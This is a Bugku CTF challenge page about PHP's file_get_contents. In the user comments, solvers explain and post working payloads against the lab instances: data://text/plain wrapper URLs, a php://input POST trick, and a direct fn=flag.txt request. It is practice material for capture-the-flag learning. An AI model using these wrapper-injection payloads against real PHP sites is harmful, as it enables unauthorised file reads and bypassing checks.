file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 4445
提  示:
描  述:
file_get_contents????
评论
zhuizhui 5月前

见到file_get_content 就要想到伪协议

回复 2

zengzhijing 5月前

http://117.72.52.127:18565/?fn=data://text/plain,test&ac=test

回复 1

Arya32f 7月前

https://blog.csdn.net/qq_52669977/article/details/143458470

回复 0

Pixelw 7月前

http://117.72.52.127:14185/?ac=bugku&fn=flag.txt

回复 0

nihaozy 7月前

http://117.72.52.127:10268/?ac=example&fn=data://text/plain,example

回复 0

6973lb 7月前

这值4金币?

回复 1

liuguowang75 8月前

/?ac=bugku&fn=flag.txt,想到flag文本了,没想到ac=bugku,哈哈

回复 0

HK1ng 8月前

file_get_contents常用来读文件,但是也可以用伪协议来控制读的内容,这里就是使用data://text/plain,test。指定数据的 MIME 类型位text,然后内容是test,这个时候我们就控制了读取的内容,只需要传参ac位test即可拿到flag。

回复 0

goodsnack 8月前

post ac=1&fn=php://input raw里填1,对应ac的值

回复 0

Zhumeng 1年前

看到file_get_getcontents就要想到伪协议

回复 1

WriteUp

image
harry

3 金币

评分(7)

解题动态

aboic 攻破了该题 3小时前
communication 攻破了该题 4小时前
cracer 攻破了该题 15小时前
16673465983 攻破了该题 15小时前
chenmin 攻破了该题 19小时前
你好世界0001 攻破了该题 20小时前
所以flag在哪? 攻破了该题 22小时前
tomato_cat 攻破了该题 1天前
demonsong 攻破了该题 1天前
zzuer 攻破了该题 1天前
gondluck 攻破了该题 2天前
Fengyu3321 攻破了该题 2天前
Zhengzanmei 攻破了该题 2天前
moyuan 攻破了该题 2天前
Yuyukon 攻破了该题 2天前
huluobu 攻破了该题 2天前
igrazee 攻破了该题 3天前
337556453 攻破了该题 3天前
kkkkbbbb 攻破了该题 3天前
xiemeimei 攻破了该题 3天前
问题反馈